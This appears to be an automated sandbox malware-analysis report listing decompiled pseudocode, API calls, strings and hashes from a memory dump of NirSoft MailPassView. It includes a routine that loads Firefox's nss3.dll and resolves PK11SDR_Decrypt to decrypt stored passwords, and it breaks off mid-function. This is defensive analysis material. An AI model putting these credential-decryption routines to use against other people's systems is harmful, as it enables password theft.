                                                                                              • Opcode Fuzzy Hash: 93cdc50bd840dfc44d83282a7c9c7e4a4c6f33fe3d7da29804190475922260c9
                                                                                              • Instruction Fuzzy Hash: 58B10A72C00219ABDB20EFA5CC819DEB7BDEF04315F1445BBE619B2191DB38AB858F54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040A774, Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 285windowregistrystringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 76%
                                                                                              			E0040A774(intOrPtr __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HMENU__* _t121;
				struct HWND__* _t122;
				intOrPtr _t128;
				int _t133;
				intOrPtr _t135;
				int _t149;
				void* _t166;
				void* _t174;
				void* _t178;
				void* _t185;
				intOrPtr _t194;
				void* _t197;
				void* _t198;
				intOrPtr _t200;
				intOrPtr _t201;
				void* _t202;
				int _t204;
				intOrPtr _t205;
				intOrPtr* _t207;
				intOrPtr* _t208;
				void* _t210;
				intOrPtr* _t211;
				void* _t213;

				_t213 = __eflags;
				_t208 = _t210 - 0x78;
				_t211 = _t210 - 0xb8;
				 *((intOrPtr*)(_t208 + 0x70)) = __ecx;
				 *((char*)(_t208 - 0x37)) = 1;
				 *(_t208 - 0x40) = 0;
				 *((intOrPtr*)(_t208 - 0x3c)) = 0;
				 *((char*)(_t208 - 0x38)) = 0;
				 *((char*)(_t208 - 0x36)) = 0;
				 *((char*)(_t208 - 0x35)) = 0;
				asm("stosd");
				asm("stosd");
				 *(_t208 - 0x2c) = 1;
				 *((intOrPtr*)(_t208 - 0x28)) = 0x9c41;
				 *((char*)(_t208 - 0x24)) = 4;
				 *((char*)(_t208 - 0x23)) = 0;
				 *((char*)(_t208 - 0x22)) = 0;
				 *((char*)(_t208 - 0x21)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 - 0x18)) = 5;
				 *((intOrPtr*)(_t208 - 0x14)) = 0x9c44;
				 *((char*)(_t208 - 0x10)) = 4;
				 *((char*)(_t208 - 0xf)) = 0;
				 *((char*)(_t208 - 0xe)) = 0;
				 *((char*)(_t208 - 0xd)) = 0;
				asm("stosd");
				asm("stosd");
				 *(_t208 - 4) = 2;
				 *_t208 = 0x9c48;
				 *((char*)(_t208 + 4)) = 4;
				 *((char*)(_t208 + 5)) = 0;
				 *((char*)(_t208 + 6)) = 0;
				 *((char*)(_t208 + 7)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x10)) = 3;
				 *((intOrPtr*)(_t208 + 0x14)) = 0x9c49;
				 *((char*)(_t208 + 0x18)) = 4;
				 *((char*)(_t208 + 0x19)) = 0;
				 *((char*)(_t208 + 0x1a)) = 0;
				 *((char*)(_t208 + 0x1b)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x24)) = 0;
				 *((intOrPtr*)(_t208 + 0x28)) = 0x9c4e;
				 *((char*)(_t208 + 0x2c)) = 4;
				 *((char*)(_t208 + 0x2d)) = 0;
				 *((char*)(_t208 + 0x2e)) = 0;
				 *((char*)(_t208 + 0x2f)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x38)) = 6;
				 *((intOrPtr*)(_t208 + 0x3c)) = 0x9c56;
				 *((char*)(_t208 + 0x40)) = 4;
				 *((char*)(_t208 + 0x41)) = 0;
				 *((char*)(_t208 + 0x42)) = 0;
				 *((char*)(_t208 + 0x43)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x4c)) = 4;
				 *((intOrPtr*)(_t208 + 0x50)) = 0x9c42;
				 *((char*)(_t208 + 0x54)) = 4;
				 *((char*)(_t208 + 0x55)) = 0;
				 *((char*)(_t208 + 0x56)) = 0;
				 *((char*)(_t208 + 0x57)) = 0;
				 *(_t208 + 0x6c) =  *(_t208 + 0x6c) | 0xffffffff;
				asm("stosd");
				_t198 = 0x66;
				asm("stosd");
				_t121 = E00407BB9(_t198);
				_t194 =  *((intOrPtr*)(_t208 + 0x70));
				 *(_t194 + 0x11c) = _t121;
				_t122 = SetMenu( *(_t194 + 0x108), _t121);
				__imp__#6(0x50000000, 0x412466,  *(_t194 + 0x108), 0x101, _t185, _t197, _t166);
				 *(_t194 + 0x114) = _t122;
				SendMessageA(_t122, 0x404, 1, _t208 + 0x6c);
				 *((intOrPtr*)(_t194 + 0x118)) = CreateToolbarEx( *(_t194 + 0x108), 0x50010900, 0x102, 7, 0, LoadImageA( *0x416b94, 0x68, 0, 0, 0, 0x9060), _t208 - 0x40, 8, 0x10, 0x10, 0x70, 0x10, 0x14);
				E004023D4( *((intOrPtr*)(_t194 + 0x370)), _t213, CreateWindowExA(0, "SysListView32", 0, 0x50810809, 0, 0, 0x190, 0xc8,  *(_t194 + 0x108), 0x103,  *0x416b94, 0), 1);
				_t128 =  *((intOrPtr*)(_t194 + 0x370));
				_t173 =  *((intOrPtr*)(_t128 + 0x1b0));
				_t200 =  *((intOrPtr*)(_t128 + 0x1b4));
				 *((intOrPtr*)(_t208 + 0x68)) =  *((intOrPtr*)(_t128 + 0x184));
				if(_t173 <= 0) {
					L3:
					_t201 =  *((intOrPtr*)(_t194 + 0x370));
					E00409EC4(_t201);
					_t133 = ImageList_ReplaceIcon( *(_t201 + 0x18c), 0, LoadIconA( *0x416b94, 0x66));
					if( *((intOrPtr*)(_t201 + 0x1b8)) != 0) {
						E00409E32(_t133, _t173, _t194, _t201);
					}
					_t202 = 0x68;
					 *((intOrPtr*)(_t194 + 0x154)) = E00407BB9(_t202);
					_t135 =  *((intOrPtr*)(_t194 + 0x37c));
					if( *((intOrPtr*)(_t135 + 0x30)) <= 0) {
						_t174 = 0x412466;
					} else {
						if( *((intOrPtr*)(_t135 + 0x1c)) <= 0) {
							_t174 = 0;
						} else {
							_t174 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 0xc)))) +  *((intOrPtr*)(_t135 + 0x10));
						}
					}
					_push("/noloadsettings");
					_push(_t174);
					L004115B2();
					if(_t135 == 0) {
						RegDeleteKeyA(0x80000001, "Software\\NirSoft\\MailPassView");
					}
					E0040AF17(_t194, 0);
					 *( *(_t194 + 0x36c)) = 1;
					SetFocus( *( *((intOrPtr*)(_t194 + 0x370)) + 0x184));
					if( *0x417660 == 0) {
						E00406172(0x417660);
						if((GetFileAttributesA(0x417660) & 0x00000001) != 0) {
							GetTempPathA(0x104, 0x417660);
						}
					}
					_t204 = strlen(0x417660);
					 *_t211 = "report.html";
					_t99 = strlen(??) + 1; // 0x1
					_t223 = _t204 + _t99 - 0x104;
					if(_t204 + _t99 >= 0x104) {
						 *((char*)(_t194 + 0x264)) = 0;
					} else {
						E004062AD(_t194 + 0x264, 0x417660, "report.html");
					}
					_push(1);
					_t178 = 0x30;
					E0040A00B( *((intOrPtr*)(_t194 + 0x370)), _t178);
					E0040A00B( *((intOrPtr*)(_t194 + 0x370)), 1, ( *(_t194 + 0x36c))[1]);
					_t149 = RegisterWindowMessageA("commdlg_FindReplace");
					_t205 = _t194;
					 *(_t194 + 0x374) = _t149;
					E0040A27F(0, 1, _t205, _t223);
					E00401E8B(_t223,  *((intOrPtr*)(_t205 + 0x370)) + 0xb20);
					 *(_t208 + 0x60) = 0x12c;
					 *((intOrPtr*)(_t208 + 0x64)) = 0x400;
					SendMessageA( *(_t205 + 0x114), 0x404, 2, _t208 + 0x60);
					return SendMessageA( *(_t205 + 0x114), 0x401, 0x1001, 0);
				} else {
					_t207 = _t200 + 0xc;
					 *((intOrPtr*)(_t208 + 0x74)) = _t173;
					do {
						_t173 =  *((intOrPtr*)(_t207 - 8));
						E00404925( *((intOrPtr*)(_t207 + 4)),  *((intOrPtr*)(_t207 - 8)),  *((intOrPtr*)(_t208 + 0x68)),  *((intOrPtr*)(_t207 - 0xc)),  *((intOrPtr*)(_t207 - 4)),  *_t207);
						_t211 = _t211 + 0x10;
						_t207 = _t207 + 0x14;
						_t82 = _t208 + 0x74;
						 *_t82 =  *((intOrPtr*)(_t208 + 0x74)) - 1;
					} while ( *_t82 != 0);
					goto L3;
				}
			}





























                                                                                              0x0040a774
                                                                                              0x0040a775
                                                                                              0x0040a779
                                                                                              0x0040a782
                                                                                              0x0040a785
                                                                                              0x0040a78d
                                                                                              0x0040a790
                                                                                              0x0040a793
                                                                                              0x0040a796
                                                                                              0x0040a799
                                                                                              0x0040a79f
                                                                                              0x0040a7a0
                                                                                              0x0040a7a1
                                                                                              0x0040a7a8
                                                                                              0x0040a7af
                                                                                              0x0040a7b3
                                                                                              0x0040a7b6
                                                                                              0x0040a7b9
                                                                                              0x0040a7c1
                                                                                              0x0040a7c2
                                                                                              0x0040a7c3
                                                                                              0x0040a7ca
                                                                                              0x0040a7d1
                                                                                              0x0040a7d5
                                                                                              0x0040a7d8
                                                                                              0x0040a7db
                                                                                              0x0040a7e3
                                                                                              0x0040a7e4
                                                                                              0x0040a7e5
                                                                                              0x0040a7ec
                                                                                              0x0040a7f3
                                                                                              0x0040a7f7
                                                                                              0x0040a7fa
                                                                                              0x0040a7fd
                                                                                              0x0040a805
                                                                                              0x0040a806
                                                                                              0x0040a807
                                                                                              0x0040a80e
                                                                                              0x0040a815
                                                                                              0x0040a819
                                                                                              0x0040a81c
                                                                                              0x0040a81f
                                                                                              0x0040a827
                                                                                              0x0040a828
                                                                                              0x0040a829
                                                                                              0x0040a82c
                                                                                              0x0040a833
                                                                                              0x0040a837
                                                                                              0x0040a83a
                                                                                              0x0040a83d
                                                                                              0x0040a845
                                                                                              0x0040a846
                                                                                              0x0040a847
                                                                                              0x0040a84e
                                                                                              0x0040a855
                                                                                              0x0040a859
                                                                                              0x0040a85c
                                                                                              0x0040a85f
                                                                                              0x0040a867
                                                                                              0x0040a868
                                                                                              0x0040a869
                                                                                              0x0040a870
                                                                                              0x0040a877
                                                                                              0x0040a87b
                                                                                              0x0040a87e
                                                                                              0x0040a881
                                                                                              0x0040a884
                                                                                              0x0040a88d
                                                                                              0x0040a890
                                                                                              0x0040a891
                                                                                              0x0040a892
                                                                                              0x0040a897
                                                                                              0x0040a8a1
                                                                                              0x0040a8a7
                                                                                              0x0040a8c2
                                                                                              0x0040a8d4
                                                                                              0x0040a8da
                                                                                              0x0040a927
                                                                                              0x0040a95f
                                                                                              0x0040a964
                                                                                              0x0040a96a
                                                                                              0x0040a972
                                                                                              0x0040a97e
                                                                                              0x0040a981
                                                                                              0x0040a9aa
                                                                                              0x0040a9aa
                                                                                              0x0040a9b2
                                                                                              0x0040a9cd
                                                                                              0x0040a9d9
                                                                                              0x0040a9db
                                                                                              0x0040a9db
                                                                                              0x0040a9e2
                                                                                              0x0040a9e8
                                                                                              0x0040a9ee
                                                                                              0x0040a9f7
                                                                                              0x0040aa0c
                                                                                              0x0040a9f9
                                                                                              0x0040a9fc
                                                                                              0x0040aa08
                                                                                              0x0040a9fe
                                                                                              0x0040aa03
                                                                                              0x0040aa03
                                                                                              0x0040a9fc
                                                                                              0x0040aa11
                                                                                              0x0040aa16
                                                                                              0x0040aa17
                                                                                              0x0040aa20
                                                                                              0x0040aa2c
                                                                                              0x0040aa2c
                                                                                              0x0040aa35
                                                                                              0x0040aa40
                                                                                              0x0040aa52
                                                                                              0x0040aa63
                                                                                              0x0040aa65
                                                                                              0x0040aa73
                                                                                              0x0040aa7b
                                                                                              0x0040aa7b
                                                                                              0x0040aa73
                                                                                              0x0040aa87
                                                                                              0x0040aa89
                                                                                              0x0040aa95
                                                                                              0x0040aa99
                                                                                              0x0040aa9f
                                                                                              0x0040aaba
                                                                                              0x0040aaa1
                                                                                              0x0040aab1
                                                                                              0x0040aab7
                                                                                              0x0040aac6
                                                                                              0x0040aaca
                                                                                              0x0040aacb
                                                                                              0x0040aae2
                                                                                              0x0040aaec
                                                                                              0x0040aaf4
                                                                                              0x0040aaf6
                                                                                              0x0040aafc
                                                                                              0x0040ab0d
                                                                                              0x0040ab29
                                                                                              0x0040ab30
                                                                                              0x0040ab37
                                                                                              0x0040ab53
                                                                                              0x0040a983
                                                                                              0x0040a983
                                                                                              0x0040a986
                                                                                              0x0040a989
                                                                                              0x0040a991
                                                                                              0x0040a99a
                                                                                              0x0040a99f
                                                                                              0x0040a9a2
                                                                                              0x0040a9a5
                                                                                              0x0040a9a5
                                                                                              0x0040a9a5
                                                                                              0x00000000
                                                                                              0x0040a989

                                                                                              APIs
                                                                                                • Part of subcall function 00407BB9: LoadMenuA.USER32 ref: 00407BC1
                                                                                                • Part of subcall function 00407BB9: sprintf.MSVCRT ref: 00407BE4
                                                                                              • SetMenu.USER32(?,00000000), ref: 0040A8A7
                                                                                              • #6.COMCTL32(50000000,Function_00012466,?,00000101), ref: 0040A8C2
                                                                                              • SendMessageA.USER32 ref: 0040A8DA
                                                                                              • LoadImageA.USER32 ref: 0040A8F0
                                                                                              • CreateToolbarEx.COMCTL32(?,50010900,00000102,00000007,00000000,00000000,?,00000008,00000010,00000010,00000070,00000010,00000014), ref: 0040A91A
                                                                                              • CreateWindowExA.USER32 ref: 0040A950
                                                                                              • LoadIconA.USER32(00000066,00000000), ref: 0040A9BF
                                                                                              • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 0040A9CD
                                                                                              • _stricmp.MSVCRT(Function_00012466,/noloadsettings), ref: 0040AA17
                                                                                              • RegDeleteKeyA.ADVAPI32(80000001,Software\NirSoft\MailPassView), ref: 0040AA2C
                                                                                              • SetFocus.USER32(?,00000000), ref: 0040AA52
                                                                                              • GetFileAttributesA.KERNEL32(00417660), ref: 0040AA6B
                                                                                              • GetTempPathA.KERNEL32(00000104,00417660), ref: 0040AA7B
                                                                                              • strlen.MSVCRT ref: 0040AA82
                                                                                              • strlen.MSVCRT ref: 0040AA90
                                                                                              • RegisterWindowMessageA.USER32(commdlg_FindReplace,?,00000001), ref: 0040AAEC
                                                                                                • Part of subcall function 00404925: strlen.MSVCRT ref: 00404942
                                                                                                • Part of subcall function 00404925: SendMessageA.USER32 ref: 00404966
                                                                                              • SendMessageA.USER32 ref: 0040AB37
                                                                                              • SendMessageA.USER32 ref: 0040AB4A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Message$Send$Loadstrlen$CreateIconImageMenuWindow$AttributesDeleteFileFocusList_PathRegisterReplaceTempToolbar_stricmpsprintf
                                                                                              • String ID: /noloadsettings$Software\NirSoft\MailPassView$SysListView32$`vA$commdlg_FindReplace$report.html
                                                                                              • API String ID: 873469642-860065374
                                                                                              • Opcode ID: a4e7fbf76496b0a5143eb8d44d5c426d23ad41d46f34e9c279854c8240868147
                                                                                              • Instruction ID: ca2bded9840d9beafebaacef77bacb5142d556b3fd29cdc4ce09694084a06bb6
                                                                                              • Opcode Fuzzy Hash: a4e7fbf76496b0a5143eb8d44d5c426d23ad41d46f34e9c279854c8240868147
                                                                                              • Instruction Fuzzy Hash: 82B12271644388FFEB16CF74CC45BDABBA5BF14304F00406AFA44A7292C7B5A954CB5A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040DB39, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 220windowstringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 88%
                                                                                              			E0040DB39(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, void _a10, unsigned int _a12, void _a264, void _a265, void _a520, void _a521, void _a776, void _a780, char _a784, char _a1056, void _a1057, char _a2080, void _a2081, char _a3104, void _a3105) {
				char _v0;
				struct HWND__* _v4;
				void* __edi;
				void* _t44;
				void* _t58;
				int _t59;
				int _t61;
				int _t62;
				long _t66;
				struct HWND__* _t93;
				intOrPtr _t122;
				unsigned int _t125;
				signed int _t127;
				signed int _t128;
				void* _t134;

				_t128 = _t127 & 0xfffffff8;
				E004118A0(0x1424, __ecx);
				_t44 = _a8 - 0x110;
				if(_t44 == 0) {
					E00406491(__edx, _a4);
					 *_t128 = 0x7ff;
					_a3104 = 0;
					memset( &_a3105, 0, ??);
					asm("movsd");
					asm("movsd");
					asm("movsw");
					memset( &_a10, 0, 0xfb);
					_a520 = 0;
					memset( &_a521, 0, 0xff);
					_a264 = 0;
					memset( &_a265, 0, 0xff);
					_a1056 = 0;
					memset( &_a1057, 0, 0x3ff);
					_a2080 = 0;
					memset( &_a2081, 0, 0x3ff);
					_t134 = _t128 + 0x48;
					_t58 = GetCurrentProcess();
					_t102 =  &_a520;
					_v4 = _t58;
					_t59 = ReadProcessMemory(_t58,  *0x416c64,  &_a520, 0x80, 0);
					__eflags = _t59;
					if(_t59 != 0) {
						E00406585( &_a1056,  &_a520, 4);
						_pop(_t102);
					}
					_t61 = ReadProcessMemory(_v4,  *0x416c58,  &_a264, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00406585( &_a2080,  &_a264, 0);
						_pop(_t102);
					}
					_t62 = E0040629C();
					__eflags = _t62;
					if(_t62 == 0) {
						E0040E056();
					} else {
						E0040E0DA();
					}
					__eflags =  *0x417514;
					if(__eflags != 0) {
						L17:
						_a776 = 0;
						memset( &_a780, 0, 0x114);
						_t122 =  *0x416e7c; // 0x0
						_t134 = _t134 + 0xc;
						_t66 = GetCurrentProcessId();
						 *0x417108 = 0;
						E0040E255(_t102, __eflags, _t66, _t122);
						__eflags =  *0x417108;
						if( *0x417108 != 0) {
							memcpy( &_a776, 0x416ff0, 0x118);
							_t134 = _t134 + 0xc;
							__eflags =  *0x417108;
							if( *0x417108 != 0) {
								strcpy( &_v0, E004061E6( &_a784));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x417518;
						if(__eflags == 0) {
							L20:
							sprintf( &_a3104, "Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n",  *0x416e70,  *0x416e7c,  &_v0,  *0x416c50,  *0x416c44,  *0x416c4c,  *0x416c48,  *0x416c40,  *0x416c3c,  *0x416c54,  *0x416c64,  *0x416c58,  &_a1056,  &_a2080);
							SetDlgItemTextA(_a4, 0x3ea,  &_a3104);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t44 == 1) {
					_t125 = _a12;
					if(_t125 >> 0x10 == 0) {
						if(_t125 == 3) {
							_t93 = GetDlgItem(_a4, 0x3ea);
							_v4 = _t93;
							SendMessageA(_t93, 0xb1, 0, 0xffff);
							SendMessageA(_v4, 0x301, 0, 0);
							SendMessageA(_v4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}


















                                                                                              0x0040db3c
                                                                                              0x0040db44
                                                                                              0x0040db4c
                                                                                              0x0040db54
                                                                                              0x0040dbd8
                                                                                              0x0040dbdf
                                                                                              0x0040dbef
                                                                                              0x0040dbf6
                                                                                              0x0040dc04
                                                                                              0x0040dc08
                                                                                              0x0040dc14
                                                                                              0x0040dc16
                                                                                              0x0040dc2d
                                                                                              0x0040dc34
                                                                                              0x0040dc46
                                                                                              0x0040dc4d
                                                                                              0x0040dc64
                                                                                              0x0040dc6b
                                                                                              0x0040dc7d
                                                                                              0x0040dc84
                                                                                              0x0040dc89
                                                                                              0x0040dc8c
                                                                                              0x0040dc9e
                                                                                              0x0040dcac
                                                                                              0x0040dcb1
                                                                                              0x0040dcb3
                                                                                              0x0040dcb5
                                                                                              0x0040dcc8
                                                                                              0x0040dcce
                                                                                              0x0040dcce
                                                                                              0x0040dce7
                                                                                              0x0040dce9
                                                                                              0x0040dceb
                                                                                              0x0040dcfd
                                                                                              0x0040dd03
                                                                                              0x0040dd03
                                                                                              0x0040dd04
                                                                                              0x0040dd09
                                                                                              0x0040dd0b
                                                                                              0x0040dd14
                                                                                              0x0040dd0d
                                                                                              0x0040dd0d
                                                                                              0x0040dd0d
                                                                                              0x0040dd19
                                                                                              0x0040dd1f
                                                                                              0x0040dd29
                                                                                              0x0040dd37
                                                                                              0x0040dd3e
                                                                                              0x0040dd43
                                                                                              0x0040dd49
                                                                                              0x0040dd4c
                                                                                              0x0040dd54
                                                                                              0x0040dd5a
                                                                                              0x0040dd5f
                                                                                              0x0040dd67
                                                                                              0x0040dd7b
                                                                                              0x0040dd80
                                                                                              0x0040dd83
                                                                                              0x0040dd89
                                                                                              0x0040dd9d
                                                                                              0x0040dda3
                                                                                              0x0040dd89
                                                                                              0x00000000
                                                                                              0x0040dd21
                                                                                              0x0040dd21
                                                                                              0x0040dd27
                                                                                              0x0040dda4
                                                                                              0x0040de08
                                                                                              0x0040de21
                                                                                              0x0040de32
                                                                                              0x0040de38
                                                                                              0x0040de40
                                                                                              0x0040de40
                                                                                              0x00000000
                                                                                              0x0040dd27
                                                                                              0x0040dd1f
                                                                                              0x0040db57
                                                                                              0x0040db5d
                                                                                              0x0040db68
                                                                                              0x0040db8b
                                                                                              0x0040db99
                                                                                              0x0040dbb4
                                                                                              0x0040dbb8
                                                                                              0x0040dbc5
                                                                                              0x0040dbce
                                                                                              0x0040dbce
                                                                                              0x0040db8b
                                                                                              0x0040db68
                                                                                              0x00000000

                                                                                              APIs
                                                                                              Strings
                                                                                              • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040DE02
                                                                                              • {Unknown}, xrefs: 0040DBFB
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusTextmemcpysprintfstrcpy
                                                                                              • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                              • API String ID: 138940113-3474136107
                                                                                              • Opcode ID: a83a35a4c36da605d140adb83b4774888d9d4a076b757738f8a3eb1b01500df5
                                                                                              • Instruction ID: 36e6f19d437acde9dae1843bd1f228cb1d7049f577ea92cd8b51c55dddb48a69
                                                                                              • Opcode Fuzzy Hash: a83a35a4c36da605d140adb83b4774888d9d4a076b757738f8a3eb1b01500df5
                                                                                              • Instruction Fuzzy Hash: 6D711C72844244BFD721EF51DC41EEB3BEDEF94344F00843EF649921A0DA399A58CBA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040DEEE, Relevance: 42.1, APIs: 16, Strings: 8, Instructions: 113libraryloaderstringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040DEEE(struct HINSTANCE__** __esi, intOrPtr _a4) {
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void* __ebx;
				void* __edi;
				int _t39;
				void* _t44;
				struct HINSTANCE__* _t53;
				struct HINSTANCE__* _t56;
				struct HINSTANCE__** _t69;

				_t69 = __esi;
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				if(_a4 != 0) {
					E004060D0(0x104,  &_v268, _a4);
				}
				if(_v268 != 0) {
					GetCurrentDirectoryA(0x104,  &(_t69[8]));
					SetCurrentDirectoryA( &_v268);
					_v532 = 0;
					memset( &_v531, 0, 0x104);
					_t39 = strlen("nss3.dll");
					_t13 = strlen( &_v268) + 1; // 0x1
					if(_t39 + _t13 >= 0x104) {
						_v532 = 0;
					} else {
						E004062AD( &_v532,  &_v268, "nss3.dll");
					}
					_t44 = GetModuleHandleA( &_v532);
					 *_t69 = _t44;
					if(_t44 != 0) {
						L9:
						_t69[1] = GetProcAddress( *_t69, "NSS_Init");
						_t69[2] = GetProcAddress( *_t69, "NSS_Shutdown");
						_t69[3] = GetProcAddress( *_t69, "PK11_GetInternalKeySlot");
						_t69[4] = GetProcAddress( *_t69, "PK11_FreeSlot");
						_t69[5] = GetProcAddress( *_t69, "PK11_CheckUserPassword");
						_t69[6] = GetProcAddress( *_t69, "PK11_Authenticate");
						_t69[7] = GetProcAddress( *_t69, "PK11SDR_Decrypt");
					} else {
						_t53 = LoadLibraryExA( &_v532, _t44, 8);
						 *_t69 = _t53;
						if(_t53 != 0) {
							goto L9;
						} else {
							E0040DEA9();
							_t56 = LoadLibraryExA( &_v532, 0, 8);
							 *_t69 = _t56;
							if(_t56 != 0) {
								goto L9;
							}
						}
					}
				}
				return 0 |  *_t69 != 0x00000000;
			}














                                                                                              0x0040deee
                                                                                              0x0040df08
                                                                                              0x0040df0f
                                                                                              0x0040df1b
                                                                                              0x0040df26
                                                                                              0x0040df2b
                                                                                              0x0040df33
                                                                                              0x0040df3e
                                                                                              0x0040df4b
                                                                                              0x0040df5b
                                                                                              0x0040df62
                                                                                              0x0040df6c
                                                                                              0x0040df7f
                                                                                              0x0040df88
                                                                                              0x0040dfa5
                                                                                              0x0040df8a
                                                                                              0x0040df9c
                                                                                              0x0040dfa2
                                                                                              0x0040dfb3
                                                                                              0x0040dfbb
                                                                                              0x0040dfbd
                                                                                              0x0040dfef
                                                                                              0x0040e005
                                                                                              0x0040e011
                                                                                              0x0040e01d
                                                                                              0x0040e029
                                                                                              0x0040e035
                                                                                              0x0040e041
                                                                                              0x0040e046
                                                                                              0x0040dfbf
                                                                                              0x0040dfcf
                                                                                              0x0040dfd3
                                                                                              0x0040dfd5
                                                                                              0x00000000
                                                                                              0x0040dfd7
                                                                                              0x0040dfd7
                                                                                              0x0040dfe7
                                                                                              0x0040dfeb
                                                                                              0x0040dfed
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040dfed
                                                                                              0x0040dfd5
                                                                                              0x0040dfbd
                                                                                              0x0040e053

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040DF0F
                                                                                              • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040DF3E
                                                                                              • SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040DF4B
                                                                                              • memset.MSVCRT ref: 0040DF62
                                                                                              • strlen.MSVCRT ref: 0040DF6C
                                                                                              • strlen.MSVCRT ref: 0040DF7A
                                                                                              • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040DFB3
                                                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFCF
                                                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFE7
                                                                                              • GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040DFFC
                                                                                              • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E008
                                                                                              • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E014
                                                                                              • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E020
                                                                                              • GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E02C
                                                                                              • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E038
                                                                                              • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 0040E044
                                                                                                • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                                                • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$strlen$CurrentDirectoryLibraryLoadmemset$HandleModulememcpy
                                                                                              • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                                                              • API String ID: 1296682400-4029219660
                                                                                              • Opcode ID: bee48e1ba3e59cf5a7585e4159a10cf2e8eb6bd81037002e4d6a425fcc2e4864
                                                                                              • Instruction ID: fea3831f464983b0eef39fbf9020f470c327cc413978f8e1f023dd725517e53d
                                                                                              • Opcode Fuzzy Hash: bee48e1ba3e59cf5a7585e4159a10cf2e8eb6bd81037002e4d6a425fcc2e4864
                                                                                              • Instruction Fuzzy Hash: 2A4187B1940309AACB20AF75CC49FC6BBF8AF64704F10496AE185E2191E7B996D4CF58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402606, Relevance: 37.6, APIs: 3, Strings: 22, Instructions: 127stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 35%
                                                                                              			E00402606(void* __ecx, void* __fp0) {
				void* __esi;
				void* _t58;
				void* _t59;
				void* _t67;
				void* _t70;
				void* _t73;
				void* _t87;
				signed int _t90;
				void* _t92;
				signed int _t96;
				intOrPtr _t100;
				intOrPtr _t101;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;
